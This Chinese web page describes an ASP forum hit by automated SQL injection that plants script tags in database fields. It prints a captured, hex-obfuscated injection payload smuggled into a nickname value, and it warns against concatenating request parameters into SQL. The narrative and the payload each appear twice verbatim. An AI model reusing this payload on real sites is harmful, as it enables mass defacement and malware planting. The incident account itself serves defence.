>内容阅读:
用工具注入然后挂马
这个是用工具注入然后挂马的,你检查一下你的代码有没有 "select * from xx where id="+request("id")这样的写法,ASP代码太容易被这种工具攻击了。
最近维护公司的一个ASP论坛,上午同事反映说某些用户的数据有些离谱地异常,让帮查查是什么原因.开始以为可能存在刷票的嫌疑,查 IIS Log ,看似正常无果,后转查看数据库中的表.无意中发现某个 varchar 字段里有 <script src=xxx> ,9成是被注入了! 接下来就是找程序,可从这么多哪里找起? 于是又试图分析 IIS Log 无果. 正当我们茫然不知所措的时候, 刚才清理的数据又回来了.于是赶紧在服务器上打开 Sql 事件探测器开始监测一段时间.大量的查找又几乎无果后突然发现某个 Sql 语句里有一大堆莫名其妙的数字,难道是这里?将其值复制后到本地随便哪个库运行一下,其值类如:
nickname = 'xxx';DeCLaRE @S NvArCHaR(4000);SeT @S=CaSt(0x4400650063006C0061007200650020004000540020005600610072006300680061007200280032003500350029002C0040004300200056006100720063006800610072002800320035003500290020004400650063006C0061007200650020005400610062006C0065005F0043007500720073006F007200200043007500720073006F007200200046006F0072002000530065006C00650063007400200041002E004E0061006D00
最近维护公司的一个ASP论坛,上午同事反映说某些用户的数据有些离谱地异常,让帮查查是什么原因.开始以为可能存在刷票的嫌疑,查 IIS Log ,看似正常无果,后转查看数据库中的表.无意中发现某个 varchar 字段里有 <script src=xxx> ,9成是被注入了! 接下来就是找程序,可从这么多哪里找起? 于是又试图分析 IIS Log 无果. 正当我们茫然不知所措的时候, 刚才清理的数据又回来了.于是赶紧在服务器上打开 Sql 事件探测器开始监测一段时间.大量的查找又几乎无果后突然发现某个 Sql 语句里有一大堆莫名其妙的数字,难道是这里?将其值复制后到本地随便哪个库运行一下,其值类如:
nickname = 'xxx';DeCLaRE @S NvArCHaR(4000);SeT @S=CaSt(0x4400650063006C0061007200650020004000540020005600610072006300680061007200280032003500350029002C0040004300200056006100720063006800610072002800320035003500290020004400650063006C0061007200650020005400610062006C0065005F0043007500720073006F007200200043007500720073006F007200200046006F0072002000530065006C00650063007400200041002E004E0061006D00
Copyright © IT之家(Www.IT55.Com) Powered By 易网科技 备案号:豫ICP备07012916号
本站QQ群:6614136 / 4218001 友情链接QQ:987950121